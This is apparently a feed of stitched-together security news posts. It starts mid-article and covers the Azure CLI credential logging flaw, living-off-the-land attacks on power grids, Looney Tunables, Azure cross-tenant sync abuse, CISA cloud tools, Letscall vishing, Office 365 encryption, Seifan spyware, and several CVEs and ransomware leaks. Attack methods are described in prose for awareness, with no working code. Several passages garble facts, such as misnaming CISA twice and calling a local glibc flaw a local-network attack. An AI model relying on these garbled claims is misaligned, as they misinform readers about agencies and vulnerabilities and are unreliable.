Let’s consider a hypothetical example to understand the implications of CVE-2023-36052:

Suppose a development team uses Azure CLI for managing their Azure resources and automates their deployment process using GitHub Actions. During their routine operations, they execute various Azure CLI commands which generate logs. These logs, by default, include plaintext credentials such as usernames and passwords.

An external attacker, aware of this vulnerability, could access the public repository where the team’s GitHub Actions are configured. By examining the CI/CD logs published there, the attacker could find and extract these plaintext credentials. With these credentials, the attacker could gain unauthorized access to the team’s Azure resources, potentially leading to data breaches, unauthorized modifications, or even service disruptions.

This scenario underscores the critical nature of CVE-2023-36052, where seemingly benign logs could inadvertently become a source of significant security breaches. The mitigation steps provided by Microsoft, including updating Azure CLI and implementing best practices for log management and key rotations, are essential to prevent such unauthorized access.

Mitigation

Microsoft implemented several measures to address this vulnerability. These include:

1. Azure CLI Update: Advising customers to update Azure CLI to the latest release.
2. Securing Logs: Avoiding exposure of Azure CLI output in logs or publicly accessible locations and implementing guidance for masking environment variables.
3. Regularly Rotating Keys and Secrets: Encouraging regular rotation of keys and secrets.
4. Reviewing Security Best Practices: Providing guidance on secrets management for Azure services and GitHub Actions, and ensuring GitHub repositories are private unless necessary to be public.
5. Securing Azure Pipelines: Offering guidance for securing Azure Pipelines.
6. Enhancing Default Configurations: Introducing a new default configuration in Azure CLI to prevent accidental disclosure of sensitive information. This included restricting the presentation of secrets in output from update commands and broadening credential redaction capabilities across GitHub Actions and Azure Pipelines.

Workaround

Without patching, the primary alternative way to mitigate the risks associated with CVE-2023-36052 involves several best practices and security measures:

1. Secure Logging Practices: Ensure that logs do not contain sensitive information. This might involve custom scripts or tools to filter out or obfuscate credentials and other sensitive data before they are logged.
2. Access Control on Logs: Restrict access to CI/CD logs. Ensure that only authorized personnel can view these logs, and they are not publicly accessible.
3. Frequent Credential Rotation: Regularly change credentials and secrets to reduce the window of opportunity for an attacker to use compromised credentials.
4. Monitoring and Alerting: Implement monitoring to detect unusual access patterns or usage of credentials, which might indicate a compromise.
5. Environment Segmentation: Segregate development, testing, and production environments. Limit the scope of what each environment can access to minimize potential damage.

However, these measures are more complex and potentially less effective than updating the Azure CLI to a patched version. Patching directly addresses the vulnerability at its source, providing a more comprehensive and straightforward solution.

The post Azure CLI stores credentials in plaintext in logs. A easy technique to hack cloud environments appeared first on Information Security Newspaper | Hacking News.

1. Initial Access

• Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. Lateral Movement

• Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. Elevation of Privileges

• Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. Discovery and Information Gathering

• Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. Exploitation and Manipulation

• Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. Persistence and Exfiltration

• Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. Cleanup

• Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

As per mandiant research, the 2022 intrusion began or prior to June 2022, culminating in two disruptive events on October 10 and 12. Sandworm accessed the OT environment via a hypervisor hosting a SCADA management instance for a substation, potentially having SCADA system access for up to three months. On October 10, Sandworm used an optical disc (ISO) image, “a.iso,” to execute a native MicroSCADA binary, likely for malicious control commands to switch off substations. The attackers, got into the operational technology (OT) system through a key piece of software (a hypervisor) that managed the control system (SCADA) of a power substation. This means they had access to the system that controls how the power substation works. For up to three months, they could have been inside this system without being detected. On October 10, they used a special file (an ISO image named “a.iso”) to run a command in the control system that was likely intended to turn off power substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

• Are harder to detect due to the use of legitimate tools.
• Can cause significant physical and operational damage.
• May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.

The post How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages appeared first on Information Security Newspaper | Hacking News.

“Looney Tunables” allows bad actors to exploit a buffer overflow within the ld.so dynamic loader of the GNU C Library (glibc). This exploitation path provides local attackers with a mechanism to elevate their privileges to root level, thereby gaining unparalleled access and control over the system. Given that root privileges allow complete control over a system, attackers can execute a variety of malicious activities, from accessing sensitive information to altering system settings and functionalities, underscoring the critical nature of this security flaw.

The GNU C Library, or glibc, is fundamentally integral to the operation of a majority of systems based on the Linux kernel. This crucial library facilitates numerous system calls, from elementary functions like open, malloc, and printf to more complex ones such as exit, serving as the operational backbone for these systems. As such, glibc plays a pivotal role in the functionality and performance of Linux-based systems, making any vulnerability within this library particularly concerning for system administrators and users alike.

Within glibc, the ld.so dynamic loader is an element of paramount importance. This component is tasked with the significant responsibility of initializing and running programs on Linux systems that rely on glibc for their operation. Its role is crucial as it ensures the smooth execution of various applications and services on a Linux system, making it an indispensable part of the operating environment. Given its central function, any vulnerability within the ld.so dynamic loader is a matter of serious concern as it could potentially compromise the security and stability of a wide range of systems.

In light of the discovery of “Looney Tunables”, it is imperative for organizations and users utilizing Linux-based systems to acknowledge and address this security vulnerability swiftly to safeguard their systems against potential exploits. Immediate mitigation steps, including the application of security patches and updates, should be undertaken to protect systems from the risks associated with this high-severity vulnerability. Users and administrators should stay vigilant and monitor any security advisories and updates issued by the Linux community and cybersecurity experts to ensure timely and effective protection against this newly identified threat.

Furthermore, it would be prudent for organizations to adopt and enforce a set of security best practices. These might include the regular updating and patching of systems, the use of reliable security solutions, conducting cybersecurity awareness and training programs for employees, and implementing network segmentation strategies. These proactive measures can significantly enhance the security posture of an organization, providing robust defense mechanisms against “Looney Tunables” and other similar security threats that might emerge in the future.

The GNU C Library’s ld.so dynamic loader was found to include the security flaw, which exposed a crack in the armor. During the processing of the ‘GLIBC_TUNABLES’ environment variable, this security hole might manifest itself. To put it more simply, a hostile attacker on the local network who has some dexterity and cunning may insert text into the ‘GLIBC_TUNABLES’ environment variable. The attacker is able to execute code with dangerously high privileges if they do this while beginning binaries that have the SUID permission.

This vulnerability was discovered by the observant members of the Qualys Threat Research Unit. According to an investigation into the origin of the vulnerability, it was first discovered in April 2021, when glibc version 2.34 was being distributed. Ironically, the commit was made with the intention of improving security by correcting the behavior of SXID_ERASE in setuid applications.

It is important to keep in mind that attackers, even those with just the most basic privileges, are able to take advantage of this severe gap. since of their simplicity and since they don’t need any input from the user, these assaults are particularly alarming.

There is a solution available for those who are unable to update their software promptly and do not have the Secure Boot capability. A SystemTap script has been made available, and once it is enabled, it will immediately stop any setuid application that has been launched with the ‘GLIBC_TUNABLES’ environment variable present. To securely call the setuid program thereafter, one just has to unset or remove the ‘GLIBC_TUNABLES’ environment variable, for instance by executing the command ‘GLIBC_TUNABLES= sudo’.

According to Saeed Abbasi, who is the Product Manager at Qualys’ Threat Research Unit, “Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, underscores the profound and ubiquitous nature of this vulnerability.”

While the Qualys team has indicated that they will not release its exploit code at this time, the inherent simplicity of transforming the buffer overflow into a data-only assault suggests that other research teams may soon take up the challenge.

Systems that are running Debian 12 and 13, Ubuntu 22.04 and 23.04, or Fedora 37 and 38 are vulnerable to the CVE-2023-4911 flaw and should be avoided at all costs. The extent of the possible harm might be enormous due to the widespread use of the glibc library in Linux’s many different distributions. Distributions such as Alpine Linux, which use the musl libc library instead of the glibc library, are given a little bit of wiggle room.

The post Hacking Debian 12, 13, Ubuntu 22.04, 23.04 & Fedora 37, 38 servers using a single vulnerability appeared first on Information Security Newspaper | Hacking News.

However, if it is not set and maintained effectively, it presents the opportunity for spying, lateral movement, and persistence assaults by malicious actors. CTS makes it possible to add people from another tenancy to a target tenant by syncing their user accounts.
It is possible to migrate laterally from a compromised tenant to another tenant of the same or a different company by exploiting a CTS setting that has been setup in a lax manner and that may be abused by an attacker. It is possible to install a malicious CTS configuration and utilize it as a backdoor approach in order to keep access to a Microsoft tenancy that is controlled by an external attacker.

Vectra AI, a cybersecurity company, recently produced a research in which it elaborated on how threat actors might use this capability to propagate laterally to related tenants or even employ this feature for persistence.

However, they also caution that in order to abuse this functionality, a threat actor must first either compromise a privileged account or acquire privilege escalation in a Microsoft cloud environment that has already been compromised. The first method detailed in Vectra AI’s paper entails evaluating the CTS settings in order to find target tenants linked via these policies and, more particularly, searching for tenants with the ‘Outbound Sync’ feature enabled, which enables synchronizing with other tenants.

After discovering a tenant that satisfies those requirements, the attacker finds the application that is used for CTS synchronization and adjusts its settings in order to include the compromised user inside its sync scope. This gives the attacker access to the network of the other tenant. Because of this, it is possible for the threat actor to accomplish lateral movement without the need for fresh user credentials.

The second method that Vectra demonstrates includes establishing a rogue CTS configuration in order to maintain permanent access to the tenants that are the focus of the attack. It should be emphasized once again that in order for this strategy to work, the threat actor must have already succeeded in compromising a privileged account inside the tenant.

To get more specific, the attacker installs a new CTS policy and activates ‘Inbound Sync’ and ‘Automatic User Consent,’ which gives them the ability to push new users from their external tenancy to the target at any moment.

Because of the way this arrangement is configured, the attacker will always have access to the target tenancy via the external account.

Even if the rogue accounts are deactivated, the attacker may still create and “push” new users at anytime, obtaining instant access to the resources of the target tenancy. This is the reason why the researchers refer to this as a “backdoor.”

Defense

The methods of attack described in this article presume the presence of a compromise. The continued implementation and enforcement of security best practices inside businesses is required to continue lowering the chance of accounts being compromised.

CTS Target residents are required to:

It is best to steer clear of the practice of establishing a default inbound CTA setup if at all possible, since this would allow any users, groups, and apps from the source tenancy to sync inbound.

Implement an incoming CTA setup that is less inclusive, such as specifically designating accounts (if it’s at all feasible) or groups that can receive access via CTS.

In order to block access by unauthorized users, combine the CTA policy with any additional Conditional Access Policies.

Tenants of CTS Source are required to:

Ensure that all privileged groups, including those that are permitted access to other tenants through CTS, are subject to the appropriate levels of regulation and monitoring.

The post New Azure AD Cross-Tenant Synchronisation (CTS)  Attack allows hacking tenants laterally appeared first on Information Security Newspaper | Hacking News.

Organizations who do not have the essential capabilities to protect themselves against cloud-based attacks may benefit from the tools that are supplied by CISA. These technologies may assist users in securing their cloud resources from data theft, information exposure, and information theft respectively.
The Cloud Industry Security Alliance (CISA) stated that companies should use the security features supplied by Cloud Service Providers and combine them with the free tools that were recommended by the CISA in order to defend themselves from these attacks. The following is a list of the tools that the CISA provides:

1. Cybersecurity Evaluation Tool (CSET).
2. The SCuBAGear tool.
3. The Untitled Goose Tool
4. Decider Tool
5. Memory Forensic on Cloud (JPCERT/CC) is an offering of Japan CERT.

The Cybersecurity Evaluation Tool, also known as the CSET.

For the purpose of assisting enterprises in the assessment of their cybersecurity posture, the CISA created this tool, which makes use of standards, guidelines, and recommendations that are widely accepted in the industry. Multiple questions about operational rules and procedures, as well as queries on the design of the system, are asked by the tool.This information is then utilized to develop a report that gives a comprehensive insight into the strengths and shortcomings of the businesses, along with suggestions to remedy them. The Cross-Sector Cyber Performance Goals (CPG) are included in the CSET version 11.5. These goals were established by the National Institute of Standards and Technology (NIST) in collaboration with the Computer Security Industry Association (CISA).

The CPG is able to give best practices and guidelines that should be followed by all organizations. This tool may assist in the fight against prevalent and significant TTPs.

M365 Secure Configuration Baseline Assessment Tool, SCuBAGear

SCuBAGear is a tool that was developed as a part of the SCuBA (Secure Cloud Business Applications) project. This project was started as a direct reaction to the Supply Chain hack that occurred with SolarWinds Orion Software. SCuBA is a piece of automated software that does comparisons between the Federal Civilian Executive Branch (FECB) and the M365 Secure configurations of the CISA. CISA, in conjunction with SCuBAGear, has produced a number of materials that may serve as a guide for cloud security and are of use to all types of enterprises. This tool resulted in the creation of three different documents:

SCuBA Technical Reference Architecture (TRA) — Offers fundamental building blocks for bolstering the safety of cloud storage environments. Cloud-based business apps (for SaaS models) and the security services that are used to safeguard and monitor them are both included in the purview of TRA.
The Hybrid Identity Solutions Architecture provides the best possible methods for tackling identity management in an environment that is hosted on the cloud.
M365 security configuration baseline (SCB) — offers fundamental security settings for Microsoft Defender 365, OneDrive, Azure Active Directory, Exchange Online, and other services.This application generates an HTML report that details policy deviations outlined in the M365 SCB guidelines and presents them.

Untitled Goose Tool

The tool, which was created in collaboration with Sandia National Laboratories, is designed to assist network defenders in locating harmful behaviors in Microsoft Azure, Active Directory, and Microsoft 365. Additionally, it enables the querying, exporting, and investigating of audit logs.Organizations who do not import these sorts of logs into their Security Incident and Event Management (SIEM) platform will find this application to be quite helpful. It was designed as an alternative to the PowerShell tools that were available at the time since those tools lacked the capability to gather data for Azure, AAD, and M365.

This is a tool that Network Defenders may use to,

Extraction of cloud artifacts from Active Directory, Microsoft Azure, and Microsoft 365
The Unified Audit Logs (UAL) should have time bounding performed on them.
Collect data making use of the time-bounding feature of the MDE (Microsoft Defender Endpoint) data Decider Tool.
Incident response analysts may find it useful to map malicious actions using this tool in conjunction with the MITRE ATT&CK methodology. In addition to this, it makes their methods more accessible and offers direction for laying out their actions in the appropriate manner.

Decider Tool

This tool, much like the CSET, asks a number of questions in order to give relevant user inquiries for the purpose of selecting the most effective identification technique. Users now have the ability to, given all of this information:

Export heatmaps from the ATT&CK Navigator.
Publish reports on the threat intelligence you have collected.
Determine and put into effect the appropriate preventative measures.
Prevent Exploitation
In addition, the CISA has given a link that describes how to use the Decider tool.

Memory Forensic on Cloud (JPCERT/CC)

It was built for constructing and analyzing the Windows Memory Image on AWS using Volatility 3, which was the reason why it was developed. In addition, Memory Forensics is necessary when it comes to the recently popular LOTL (Living-Off-the-Land) attacks, which are also known as fileless malware. 
Memory image analysis may be helpful during incident response engagements, which often call for the use of high-specification equipment, a significant amount of time, and other resources in order to adequately prepare the environment.

The post Top 5 free cloud security tools, that can protect your AWS & Azure cloud data from hackers appeared first on Information Security Newspaper | Hacking News.

Even though it would be upsetting to get phone calls from people professing to work at the bank, the likelihood that every incoming call you get throughout the day is coming from a con artist is incredibly high. During the course of their routine investigations into potential dangers, they came across a previously unknown collection of malicious programs that were quite similar to those that Kaspersky had identified.

“Letscall” is the name given to this toolset by the threat actor group that is responsible for these campaigns. At the moment, the victims of these campaigns are people living in South Korea. In a purely technical sense, there is nothing stopping them from expanding the scope of the assault to include nations inside the European Union. In other words, we are dealing with a framework that is completely functional and ready to be utilized. This framework has all of the instructions and tools necessary to run the afflicted devices and to connect with the victims. It is possible for any threat actor to use this framework.

Most likely included in this group are:

1. Android developers who are conversant with the contemporary notion of VOIP traffic routing. They refer to participants in one of the phases as “developers” since they noticed command name discrepancies throughout that stage.
2. Designers who are accountable for the web pages, iconography, and content of the administrative panel, phishing web sites, and mobile harmful apps they create.
   Frontend developers that are proficient in JavaScript programming and have experience with the processing of VOIP communications.
3. Backend developers that are experienced with the methods used to safeguard the backend API against unauthorized access.
4. Call operators who are proficient in a variety of languages and have experience in conducting voice-based social engineering attacks.
   

The attack is divided into three phases, which are as follows:

Phishing takes place when a victim accesses a website that has been designed to seem to be the Google Play Store. The first malicious program in the chain is downloaded by the victim from that URL, which is the first step in the chain.

This first step, which we will refer to as the downloader, will access the phishing web page, execute preparations on the device, gain the appropriate rights, and install the second stage malware, which will be downloaded from the control server.

The second step of the attack is a strong spyware program that the attacker will use to both exfiltrate data and enroll the infected device in a peer-to-peer voice over Internet Protocol (P2P VOIP) network that will be used to connect with the victim through audio or video conversations. Additionally, a third step, the subsequent link in the chain, is removed by this application. Letscall makes advantage of WEBRTC technologies in order to redirect the VOIP traffic and establish a connection between the victim and call-center operators. Letscall employs STUN/TURN technologies, including Google STUN servers, to circumvent network address translation (NAT) and firewalls to obtain the highest possible quality for phone or video calls.

The third stage is a companion program that extends some of the functionalities of the second stage malware. It has phone call capability, which is used to divert the call from the victim device to the contact center that is controlled by the attacker.

After conducting an investigation into the “Letscall” malware operations, they discovered a cybercriminal organization that is well-versed in Android security as well as contemporary voice routing technology. The researchers demonstrated that social engineering assaults that are technically sound but poorly executed may nevertheless pose a significant risk.

It is evident that technical features are just as vital as social engineering, which is supported by the care the group devotes to creating phony Google Play sites, stolen logos of the existing Korean apps, along with a novel approach employing nanoHTTPD to drop the payload. This is obvious evidence that technical features are just as important as social engineering.

Theft of resident registration numbers (or IDs) may open numerous doors for cybercriminals, and we anticipate this attack vector only increasing as more and more electronic ID solutions are used by governments as well as private businesses and public organizations. It is not uncommon for Asian threat groups to make use of an evasive method that has already been used by other actors. It’s probable that certain software engineers in one location do work for more than one cybercrime organization, even if they aren’t physically located next to one other in the same office building.

The post VoIP phishing call to rob a bank. New Letscall attack technique appeared first on Information Security Newspaper | Hacking News.

This technique is used to send and receive encrypted emails between internal and external users without revealing any information about their correspondence.

Due to the weakness, malicious third parties may get access and be able to decrypt encrypted emails, revealing private user communications. The secrecy of the communications is compromised since the ECB divulges their structural information.

WithSecure was able to decrypt an image’s AES-encrypted data during analysis. The underlying issue, according to researchers, is the ECB mode, not AES. When WithSecure alerted Microsoft, the business said the report didn’t fulfill the criteria for security servicing and doesn’t qualify as a breach, according to information given by WithSecure.

“Neither a breach nor a notification were deemed to fulfill the standards for security servicing. Since there was no code modification, there was no CVE for this report.

Microsoft
Even though WithSecure demonstrated that there was a chance of exploitation, it also cited NIST’s response, in which the organization acknowledged that the ECB mode was in fact defective. However, until Microsoft provides a remedy or a better alternative is available, users should exercise caution and companies employing OME for email encryption should avoid adopting it as the exclusive source of email secrecy.

The post Message Encryption (OME) used by Office 365 can easily be broken to read encrypted emails via MiTM appeared first on Information Security Newspaper | Hacking News.

The spyware’s software included various capabilities  ranging from listening to any phone call on a victim phone, reading text messages, to remotely listen via microphone and start the camera without the victim’s knowledge. The spyware also allowed get location, contacts list, SMS, WhatsApp messages, emails, instant messaging, outgoing and incoming calls, calendar, remote recordings and  remote camera use

Earlier, the former Israeli police commissioner said that “The Police don’t have Pegasus”. In response, an investigative committee led by Courts for checking whether police used the spyware to hack into people’s phones without permission found out that the police had Seifan.

Court discovered that even though there had been no eavesdropping without court orders, the spyware was deployed in 2016. The phone data collected was more than what was legally allowed by court orders and the organization still holds the information in the databases of its cyber department.

According to Israel newspaper Haaretz, the leaked presentation highlighted the screenshots of the  spyware, which included covertly monitoring “protected messages” as well as voice and text chats on advanced cell phones. Police had complete control of the victim’s cell phone after infecting it. 

The spyware and capabilities of the police-implemented system, were ever presented to the cabinet ministers. Screenshots from the prototype of the system the police intended to use were included in the presentation and show the NSO logo and the product name Pegasus itself. 

Another capability of Seifan is “volume listening” and is considered much more intrusive. It means listing calls in real time via activating a phone microphone remotely and listening to real time calls vai it. Rather than hacking into a cell phone sim card. This type of wiretapping requires an order from a district court president or their deputy.

The post Seifan: See the version of Pegasus spyware software designed just for Police appeared first on Information Security Newspaper | Hacking News.

CVE-2022-1890: A buffer overflow has been identified in the ReadyBootDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code. 

CVE-2022-1891: A buffer overflow has been identified in the SystemLoadDefaultDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code. 

CVE-2022-1892: A buffer overflow has been identified in the SystemBootManagerDxe driver in some Lenovo notebook products which may allow an attacker with local privileges to execute arbitrary code.

Potential Impact: Privilege escalation 

Severity: Medium

Mitigation

Owners of affected devices are highly recommended to update to the latest firmware version. To download the version specified for your product below, follow these steps: Navigate to the Drivers & Software support site for your product:

1. Search for your product by name or machine type.
2. Click Drivers & Software on the left menu panel.
3. Click on Manual Update to browse by Component type.
4. Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.

List of Models affected

The post 3 Critical Vulnerabilities In Lenovo Laptops’ UEFI  (70 Models Including Thinkbook) Allow Them To Be Hacked Forever, Even After Removing The Hard Drive appeared first on Information Security Newspaper | Hacking News.

According to the report, the security flaw, tracked as CVE-2020-1956, would allow remote code execution on vulnerable systems.

Apparently there are some relaxing APIs in Kylin, which can connect operating system commands to the string entered by the user. Because user input is not properly verified, threat actors could execute any system command without any verification.

Cyber security awareness experts also mentioned that proof of concept for the vulnerability was revealed, and users of affected deployments were also asked to take the necessary steps to protect their systems. According to the report, the affected versions are:

• Kylin 2.3.0 – 2.3.2
• Kylin 2.4.0 – 2.4.1
• Kylin 2.5.0 – 2.5.2
• Kylin 2.6.0 – 2.6.5
• Kylin 3.0.0-alpha
• Kylin 3.0.0-alpha2
• Kylin 3.0.0-beta
• Kylin 3.0.0 – 3.0.1

On the other hand, Kylin versions 2.6.6 and Kylin 3.0.2 are not affected by the vulnerability.

To fix the flaw, Apache Kylin developers fixed the flaw in the latest software releases (2.6.6 and 3.0.2). Users are strongly encouraged to upgrade to fixed versions as soon as possible to mitigate the risk of exploitation.

In case users are unable to install the updates, users will be able to set kylin.tool.auto-migrate-cube.enabled to false, which will disable the execution of remote commands, cyber security awareness experts mention.

For further reports on vulnerabilities, exploits, malware variants and computer security risks you can access the website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.

The post [CVE-2020-1956] Apache Kylin command injection vulnerability appeared first on Information Security Newspaper | Hacking News.

Microsoft will soon release a patch on 14 Jan 2020 for this extremely dangerous vulnerability in a Windows module called crypt32.dll. This crypt32.dll is responsible for certificates and it is also responsible for exchange of encrypted messages in the Windows Crypto API. This API helps developers encryption and decryption of data using digital certificates. This flaw can be misused by malware writer and even ransomware writer in spoofing digital certificates and the malware will appear as a benign program.

According to KrebsOnSecurity portal, Microsoft has already shared the patch with the defense organizations and the country wide critical infrastructures. According to International Institute of Cyber Security, this vulnerability poses a serious threat on the important Windows functions:

• Windows Authentication on desktop and servers
• Confidential data retained by Microsoft Internet Explorer and Edge browsers
• and third-party applications.

This vulnerability is present in Windows from decades, starting Windows NT. Microsoft will release a patch on Tuesday and possibly some more information regarding the vulnerability.

The post Microsoft will fix most dangerous vulnerability in Windows appeared first on Information Security Newspaper | Hacking News.

One of Sodinokibi, representative known as REvil, has publicly declared they will follow Maze Ransomware and will publish all stolen files of victim if they did not pay the ransom. Promises which were made by Sodinokibi ransomware representative have posted stolen data of around 337 MB on Russian forum.

Sodinokibi representative says data belongs to Artech Information System, who represents themselves as “Minority & Women Owned Diversity Supplier” largest staffing company in US. According to ethical hacking researcher of international institute of cyber security, website of Artech site is down. Hackers have posted only small amount of data & said if they don’t get paid, they will keep posting data to third parties which will include financial details also.

When many security researchers tries to reach Artech about the ransomware attack related question, the company did not heard back. In recent years, we have seen many ransomware attacks which needs to be treated very seriously as most important data breach.

Thanks to Michael Gillespie and his team members for working on ransomware like Sodinokibi and helping the world from ransomware attacks.

The post Ransomware stolen data is made public by hackers, for the First Time appeared first on Information Security Newspaper | Hacking News.